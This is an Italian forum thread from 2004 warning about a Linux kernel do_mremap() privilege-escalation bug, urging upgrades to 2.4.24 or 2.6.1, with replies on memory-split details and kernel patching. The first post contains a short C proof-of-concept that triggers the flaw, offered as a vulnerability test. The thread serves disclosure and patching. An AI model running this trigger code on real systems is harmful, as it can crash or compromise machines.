Torna indietro   Hardware Upgrade Forum > Software > Linux, Unix, OS alternativi

Peugeot Polygon Concept: ecco il futuro delle utilitarie
Peugeot Polygon Concept: ecco il futuro delle utilitarie
Polygon è la concept car di Peugeot che mostra il futuro delle soluzioni del segmento B: tra design compatti e innovativi affiancati da dimensioni compatte uno scherzo dalla manovrabilità incredibile per le manovre a bassa velocità
Reno16 Pro: il compatto di OPPO punta su fotocamera da 200MP e il nuovo Bubble! La recensione
Reno16 Pro: il compatto di OPPO punta su fotocamera da 200MP e il nuovo Bubble! La recensione
OPPO ha portato in Italia, dal 1° luglio 2026, Reno16 Pro: display AMOLED da 6,32 pollici a 144Hz, tripla fotocamera con sensore principale da 200 megapixel, chip Dimensity 8550 Super e batteria da 6000mAh, al prezzo di lancio di 899 euro. Lo abbiamo provato per due settimane insieme al nuovo accessorio Bubble, per capire se la formula compatta della serie regge ancora di fronte a un listino da 1099 euro
 Hisense 55U7SE: tuttofare e accessibile, il MiniLED per film, sport e gioco
Hisense 55U7SE: tuttofare e accessibile, il MiniLED per film, sport e gioco
MiniLED di fascia media con local dimming a 192 zone, 144 Hz nativi e audio firmato Devialet. La prova strumentale riscontra colori affidabili e gaming reattivo, per un prodotto molto accessibile e convincente. Ma la soundbar aggiuntiva è quasi d'obbligo
Tutti gli articoli Tutte le news

Vai al Forum
Rispondi
 
Strumenti
Old 13-01-2004, 05:12   #1
mjordan
Bannato
 
L'Avatar di mjordan
 
Iscritto dal: Mar 2002
Città: Pescara - 未婚・恋人なし Moto: Honda CBR 1000 RR ‫Casco: XR1000 Diabolic 3
Messaggi: 27578
ATTENZIONE: Pericoloso bug nel kernel

E' stato da poco scoperto un bug che affligge tutte le versioni del kernel 2.4.x precedenti la 2.4.24 e il kernel 2.6.0 escluso il 2.6.1 nella gestione della VM e precisamente nella funzione do_mremap().

Il bug è pericoloso perchè opportunamente sfruttato può portare un utente ad avere il controllo completo della macchina in locale tramite l'esecuzione di istruzioni in kernel mode.
Per testare se il vostro sistema è afflitto usare il seguente codice:

Codice:
#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>

#define MREMAP_MAYMOVE  1
#define MREMAP_FIXED    2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
                         size_t, old_size, size_t, new_size,
                         unsigned long, flags, void *, new_address );

int main( void )
{
        void *base;

        base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
                             MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

        real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
                          (void *) 0xC0000000 );

        fork();

        return( 0 );
}
Per correggere il problema upgradare subito il kernel ad una versione 2.4.24 o 2.6.1.
mjordan è offline   Rispondi citando il messaggio o parte di esso
Old 13-01-2004, 05:15   #2
Allusivo
Bannato
 
L'Avatar di Allusivo
 
Iscritto dal: Dec 2003
Città: Pordenone
Messaggi: 609
Allusivo è offline   Rispondi citando il messaggio o parte di esso
Old 13-01-2004, 05:34   #3
mjordan
Bannato
 
L'Avatar di mjordan
 
Iscritto dal: Mar 2002
Città: Pescara - 未婚・恋人なし Moto: Honda CBR 1000 RR ‫Casco: XR1000 Diabolic 3
Messaggi: 27578
Quote:
Originariamente inviato da Allusivo
mjordan è offline   Rispondi citando il messaggio o parte di esso
Old 13-01-2004, 08:54   #4
hilo
Senior Member
 
Iscritto dal: Jan 2002
Messaggi: 2370
mandrake: pacchetti da aggiornare

http://www.mandrakesecure.net/en/adv...MDKSA-2004:001

i pacchetti sono comunque in linea nella sezione updates - 9.2 (cito quella che uso io) dei vari mirror
hilo è offline   Rispondi citando il messaggio o parte di esso
Old 13-01-2004, 09:25   #5
VICIUS
Senior Member
 
L'Avatar di VICIUS
 
Iscritto dal: Oct 2001
Messaggi: 11471
pensavo che con l'ultimo bug avessero capito che devono publicizarle di piu ste cose altrimenti passano inosservate e nessuno aggiorna il kernel.

ciao
VICIUS è offline   Rispondi citando il messaggio o parte di esso
Old 13-01-2004, 09:59   #6
hilo
Senior Member
 
Iscritto dal: Jan 2002
Messaggi: 2370
Quote:
Originariamente inviato da VICIUS
pensavo che con l'ultimo bug avessero capito che devono publicizarle di piu ste cose altrimenti passano inosservate e nessuno aggiorna il kernel.

ciao
comunque un utente mandrake, questa pagina la dovrebbe avere
nel suo bookmark
http://www.mandrakesecure.net/en/adv...es.php?dis=9.2

fatta molto bene, nello stile mandrake; anche perche' i bugfix updates i mandrakisti li conoscono molto bene

ciao
hilo è offline   Rispondi citando il messaggio o parte di esso
Old 13-01-2004, 12:09   #7
ilsensine
Senior Member
 
L'Avatar di ilsensine
 
Iscritto dal: Apr 2000
Città: Roma
Messaggi: 15625
Re: ATTENZIONE: Pericoloso bug nel kernel

Un pò , è stato fissato da un paio di settimane.

Curiosità:
Quote:
Originariamente inviato da mjordan
Per testare se il vostro sistema è afflitto usare il seguente codice:
Non funziona sul mio kernel, che è tuttavia affetto dal bug
Qualche guru intuisce il perché? (indizio: sto usando 1GB tondo tondo senza necessità di supporto highmem)
__________________
0: or %edi, %ecx; adc %eax, (%edx); popf; je 0b-22; pop %ebx; fadds 0x56(%ecx); lds 0x56(%ebx), %esp; mov %al, %al
andeqs pc, r1, #147456; blpl 0xff8dd280; ldrgtb r4, [r6, #-472]; addgt r5, r8, r3, ror #12
ilsensine è offline   Rispondi citando il messaggio o parte di esso
Old 13-01-2004, 17:03   #8
Allusivo
Bannato
 
L'Avatar di Allusivo
 
Iscritto dal: Dec 2003
Città: Pordenone
Messaggi: 609
Re: Re: ATTENZIONE: Pericoloso bug nel kernel

Quote:
Originariamente inviato da ilsensine
Un pò , è stato fissato da un paio di settimane.

Curiosità:

Non funziona sul mio kernel, che è tuttavia affetto dal bug
Qualche guru intuisce il perché? (indizio: sto usando 1GB tondo tondo senza necessità di supporto highmem)
che forza, metterò il banchetto da 256mb anch'io allora così arrivo a 1gb tondo tonto!
Allusivo è offline   Rispondi citando il messaggio o parte di esso
Old 13-01-2004, 18:31   #9
maxithron
Senior Member
 
L'Avatar di maxithron
 
Iscritto dal: Mar 2002
Città: Italy/Usa
Messaggi: 2817
Re: Re: ATTENZIONE: Pericoloso bug nel kernel

Quote:
Originariamente inviato da ilsensine
.
Qualche guru intuisce il perché? (indizio: sto usando 1GB tondo tondo senza necessità di supporto highmem)
Lungi da me la "gurusaggine"...ci provo lo stesso:

Forse perchè utilizzando 1GB tondo tondo sfrutti tutta mem fisica e non VM?
__________________
"Utilizzando atomi pentavalenti drogheremo il silicio di tipo n;
Utilizzando atomi trivalenti drogheremo il silicio di tipo p;
Utilizzando della cannabis ci drogheremo noi e vedremo il silicio fare cose impossibili" - DSDT-HowTo
maxithron è offline   Rispondi citando il messaggio o parte di esso
Old 13-01-2004, 19:12   #10
maxithron
Senior Member
 
L'Avatar di maxithron
 
Iscritto dal: Mar 2002
Città: Italy/Usa
Messaggi: 2817
Per tutti quelli che hanno copiato ed incollato il codice postato da mjordan:

Beh.....sappiate che adesso lui ha il controllo delle vostre macchine. Ci siete cascati come i classici utonti winzozz!!!

































LOL!!!!! STO SCHERZANDO!!!!!!
__________________
"Utilizzando atomi pentavalenti drogheremo il silicio di tipo n;
Utilizzando atomi trivalenti drogheremo il silicio di tipo p;
Utilizzando della cannabis ci drogheremo noi e vedremo il silicio fare cose impossibili" - DSDT-HowTo
maxithron è offline   Rispondi citando il messaggio o parte di esso
Old 13-01-2004, 19:51   #11
ilsensine
Senior Member
 
L'Avatar di ilsensine
 
Iscritto dal: Apr 2000
Città: Roma
Messaggi: 15625
Re: Re: Re: ATTENZIONE: Pericoloso bug nel kernel

Quote:
Originariamente inviato da maxithron
Lungi da me la "gurusaggine"...ci provo lo stesso:

Forse perchè utilizzando 1GB tondo tondo sfrutti tutta mem fisica e non VM?
Guarda, questa me la devi tradurre

No ho semplicemente riservato 1.5GB di indirizzi virtuali per il kernel, quindi la mia base è 0xa0000000 e non 0xc0000000 come l'esempio di mjordan si aspetta. Mi serviva questa modifica anche perché avevo bisogno, per altri motivi, di una buona quantità di indirizzi virtuali liberi per il kernel.
__________________
0: or %edi, %ecx; adc %eax, (%edx); popf; je 0b-22; pop %ebx; fadds 0x56(%ecx); lds 0x56(%ebx), %esp; mov %al, %al
andeqs pc, r1, #147456; blpl 0xff8dd280; ldrgtb r4, [r6, #-472]; addgt r5, r8, r3, ror #12
ilsensine è offline   Rispondi citando il messaggio o parte di esso
Old 13-01-2004, 20:23   #12
maxithron
Senior Member
 
L'Avatar di maxithron
 
Iscritto dal: Mar 2002
Città: Italy/Usa
Messaggi: 2817
Re: Re: Re: Re: ATTENZIONE: Pericoloso bug nel kernel

Quote:
Originariamente inviato da ilsensine
Guarda, questa me la devi tradurre
Non c'è bisogno....la tua faccina è già ,molto eloquente!!

Dovevo metterne una anch'io.

EDIT: cmq il senso (o ilsensine.....) di quello che volevo dire così, su quattro zampe, era questo:

Che avendo tu a disposizione una tale quantità di memoria reale, non avessi molto bisogno di riservare address per la memoria virtuale.
__________________
"Utilizzando atomi pentavalenti drogheremo il silicio di tipo n;
Utilizzando atomi trivalenti drogheremo il silicio di tipo p;
Utilizzando della cannabis ci drogheremo noi e vedremo il silicio fare cose impossibili" - DSDT-HowTo

Ultima modifica di maxithron : 13-01-2004 alle 20:48.
maxithron è offline   Rispondi citando il messaggio o parte di esso
Old 14-01-2004, 07:55   #13
ilsensine
Senior Member
 
L'Avatar di ilsensine
 
Iscritto dal: Apr 2000
Città: Roma
Messaggi: 15625
Ho come l'impressione che confondi gli "indirizzi di memoria virtuale" con la memoria virtuale implementata ad es. tramite swap
__________________
0: or %edi, %ecx; adc %eax, (%edx); popf; je 0b-22; pop %ebx; fadds 0x56(%ecx); lds 0x56(%ebx), %esp; mov %al, %al
andeqs pc, r1, #147456; blpl 0xff8dd280; ldrgtb r4, [r6, #-472]; addgt r5, r8, r3, ror #12
ilsensine è offline   Rispondi citando il messaggio o parte di esso
Old 14-01-2004, 13:18   #14
mjordan
Bannato
 
L'Avatar di mjordan
 
Iscritto dal: Mar 2002
Città: Pescara - 未婚・恋人なし Moto: Honda CBR 1000 RR ‫Casco: XR1000 Diabolic 3
Messaggi: 27578
Re: Re: ATTENZIONE: Pericoloso bug nel kernel

Quote:
Originariamente inviato da ilsensine
Un pò , è stato fissato da un paio di settimane.
Già ma visto che sto bug è pericoloso per gli utenti che non ne erano a conoscenza e che hanno utenti sulla propria macchina ho pensato di postarlo quì...

Repetita juvant!
mjordan è offline   Rispondi citando il messaggio o parte di esso
Old 14-01-2004, 13:26   #15
NA01
Senior Member
 
L'Avatar di NA01
 
Iscritto dal: Jun 2003
Città: Genova
Messaggi: 5676
sempre meglio saperlo 2 volte (io cmq non lo sapevo )

domanda stupida!
che sito/mailing list usate per tenervi aggiornati sui buchi?

cia
NA01 è offline   Rispondi citando il messaggio o parte di esso
Old 14-01-2004, 22:46   #16
Darky
Senior Member
 
Iscritto dal: Oct 2001
Città: Milano - Bari
Messaggi: 756
però che pizza l'upgrade del kernel in linux....ogni volta devi ricrearti e reinstallarti i moduli....e se hai driver o pacchetti compilati per il kernel precedente devi pure fare il rebuild di questi ed ottenere il nuov pacchetto per il nuovo kernel ( a propo', ques'ultima roba si può evitare o è meglio farla ? ).

Per fortuna io devo solo
ribuildare un driver, reinstallarlo e ricaricarne il modulo e riconfigurare il modem

Reinstallare e riconfigurare un secondo modulo/driver....

ma chissà chi ha da rifare molto di più ...boh....perdonatemi lo sfoghino dovuto all'ignoranza in materia...
__________________
Asus N56VZ-S4035V: CPU: i7-3610QM - RAM: 16 GB - GPU: 650m 2GB DDR3 - STORAGE: 256GB SSD (P830 Samsung) + 750 GB 7200 rpm - DISPLAY: Full HD 1920x1080 (LG-Philips) - OS: Windows 7 Home Premium
Darky è offline   Rispondi citando il messaggio o parte di esso
Old 15-01-2004, 11:37   #17
linux_goblin
Senior Member
 
L'Avatar di linux_goblin
 
Iscritto dal: Oct 2000
Città: bergamo
Messaggi: 713
ma non ci sono le patch che effettuano l'aggiornamento dei sorgenti?

così compili solo una volta senza effettuare alcun rebuild.

o sbaglio?

ciau,
Marco - Goblin
linux_goblin è offline   Rispondi citando il messaggio o parte di esso
Old 15-01-2004, 11:44   #18
Darky
Senior Member
 
Iscritto dal: Oct 2001
Città: Milano - Bari
Messaggi: 756
si ma vedi nel mio caso si tratta di sorgenti di driver rilasciati da case produttrici di hardware.
E' già un miracolo che ci siano questi....ed infatti io li

figuriamoci se ora si mettono a fare le patch
__________________
Asus N56VZ-S4035V: CPU: i7-3610QM - RAM: 16 GB - GPU: 650m 2GB DDR3 - STORAGE: 256GB SSD (P830 Samsung) + 750 GB 7200 rpm - DISPLAY: Full HD 1920x1080 (LG-Philips) - OS: Windows 7 Home Premium
Darky è offline   Rispondi citando il messaggio o parte di esso
Old 15-01-2004, 15:30   #19
maxithron
Senior Member
 
L'Avatar di maxithron
 
Iscritto dal: Mar 2002
Città: Italy/Usa
Messaggi: 2817
Quote:
Originariamente inviato da ilsensine
Ho come l'impressione che confondi gli "indirizzi di memoria virtuale" con la memoria virtuale implementata ad es. tramite swap
Ci ho messo un pò a chiarirmi le idee. Ora va meglio!!
__________________
"Utilizzando atomi pentavalenti drogheremo il silicio di tipo n;
Utilizzando atomi trivalenti drogheremo il silicio di tipo p;
Utilizzando della cannabis ci drogheremo noi e vedremo il silicio fare cose impossibili" - DSDT-HowTo
maxithron è offline   Rispondi citando il messaggio o parte di esso
Old 15-01-2004, 17:04   #20
mjordan
Bannato
 
L'Avatar di mjordan
 
Iscritto dal: Mar 2002
Città: Pescara - 未婚・恋人なし Moto: Honda CBR 1000 RR ‫Casco: XR1000 Diabolic 3
Messaggi: 27578
La patch 2.4.23 --> 2.4.24 sono solo 4Kb compressi bz2. Aggiorna dei file sorgenti che in nessun modo vanno ad intaccare il funzionamento di qualche modulo o driver. Se uno ha già un ramo di sorgenti ricompilato bastano 30 secondi per ricompilare quella decina di sorgenti e ricopiare la nuova immagine nella posizione dedicata al boot. Semplice e indolore.

Sarò pure una "pizza" ma la potenza è ovviamente un compromesso che va a scapito della comodità/facilità d'uso. Dipende dal prorpio concetto di sistema operativo IMHO.
mjordan è offline   Rispondi citando il messaggio o parte di esso
 Rispondi


Peugeot Polygon Concept: ecco il futuro delle utilitarie Peugeot Polygon Concept: ecco il futuro delle ut...
Reno16 Pro: il compatto di OPPO punta su fotocamera da 200MP e il nuovo Bubble! La recensione Reno16 Pro: il compatto di OPPO punta su fotocam...
 Hisense 55U7SE: tuttofare e accessibile, il MiniLED per film, sport e gioco Hisense 55U7SE: tuttofare e accessibile, il Min...
Kindle Scribe Colorsoft: riduce le cornici e diventa a colori, ma il prezzo è alto Kindle Scribe Colorsoft: riduce le cornici e div...
L'IA cambia tutte le regole della sicurezza tra vulnerabilità e sorveglianza. Intervista al CEO di Proofpoint L'IA cambia tutte le regole della sicurezza tra ...
Apple potrebbe aver sospeso il progetto ...
Nintendo non seguirà l'esempio di...
Motorola ha lanciato un'app dedicata all...
Cyberpunk 2077 non si ferma e raggiunge ...
Samsung alza ancora i prezzi delle memor...
4 sconti tutti nuovi riscrivono la TOP 1...
Portatile HP con Intel Core Ultra 7 155H...
Smart TV Haier 50'' 4K crolla a 225,99€ ...
Google Pixel 10a a 399€ o 497€ (256GB) c...
Compare dal nulla e blocca lo schermo: c...
Tornano i super prezzi Nikon su Amazon, ...
Compatto, leggerissimo (1,2Kg), ma con 3...
Privacy Display per tutti i Galaxy S: Sa...
Le migliori cuffie in offerta su Amazon ...
SpaceX Starship: Ship 40 ha eseguito un ...
Chromium
GPU-Z
OCCT
LibreOffice Portable
Opera One Portable
Opera One 106
CCleaner Portable
CCleaner Standard
Cpu-Z
Driver NVIDIA GeForce 546.65 WHQL
SmartFTP
Trillian
Google Chrome Portable
Google Chrome 120
VirtualBox
Tutti gli articoli Tutte le news Tutti i download

Strumenti

Regole
Non Puoi aprire nuove discussioni
Non Puoi rispondere ai messaggi
Non Puoi allegare file
Non Puoi modificare i tuoi messaggi

Il codice vB è On
Le Faccine sono On
Il codice [IMG] è On
Il codice HTML è Off
Vai al Forum


Tutti gli orari sono GMT +1. Ora sono le: 18:48.


Powered by vBulletin® Version 3.6.4
Copyright ©2000 - 2026, Jelsoft Enterprises Ltd.
Served by www3v